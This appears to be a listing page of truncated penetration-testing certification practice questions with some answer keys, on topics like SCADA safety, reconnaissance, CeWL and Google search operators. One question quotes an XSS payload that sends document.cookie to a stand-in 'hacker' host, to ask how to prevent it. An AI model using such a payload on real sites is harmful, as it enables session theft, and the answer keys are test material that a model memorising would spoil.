Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?A . PLCs...

August 3, 2023 No Comments READ MORE +

Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools?

During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.)A . Scraping social...

August 3, 2023 No Comments READ MORE +

Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?A . Test for RFC-defined protocol conformance. B. Attempt...

August 2, 2023 No Comments READ MORE +

Which of the following are the BEST methods to prevent against this type of attack?

Given the following code: <SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SC RIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)A . Web-application firewall B. Parameterized queries C. Output encoding D. Session tokens E. Input validation F. Base64 encodingView AnswerAnswer: C,E Explanation: Encoding (commonly called “Output Encoding”) involves...

August 2, 2023 No Comments READ MORE +

Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?A . DirBuster B. CeWL C. w3af D. PatatorView AnswerAnswer: B Explanation: CeWL, the Custom Word List Generator, is a Ruby application...

August 2, 2023 No Comments READ MORE +

Which of the following is the reason for the error?

A penetration tester created the following script to use in an engagement: However, the tester is receiving the following error when trying to run the script: Which of the following is the reason for the error?A . The sys variable was not defined. B. The argv variable was not defined....

August 2, 2023 No Comments READ MORE +

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:A . devices produce more heat and consume more power. B. devices are obsolete and are no longer available for replacement. C. protocols are more difficult to understand. D. devices may cause physical world effects.View...

August 2, 2023 No Comments READ MORE +

In Python socket programming, SOCK_DGRAM type is:

In Python socket programming, SOCK_DGRAM type is:A . reliable. B. matrixed. C. connectionless. D. slower.View AnswerAnswer: C Explanation: Connectionless due to the Datagram portion mentioned so that would mean its using UDP.

August 2, 2023 No Comments READ MORE +

Which of the following types of attacks would MOST likely be used to avoid account lockout?

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?A ....

August 1, 2023 No Comments READ MORE +

Which of the following commands should the penetration tester consider?

A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?A . inurl: B. link: C. site: D. intitle:View AnswerAnswer: C

August 1, 2023 No Comments READ MORE +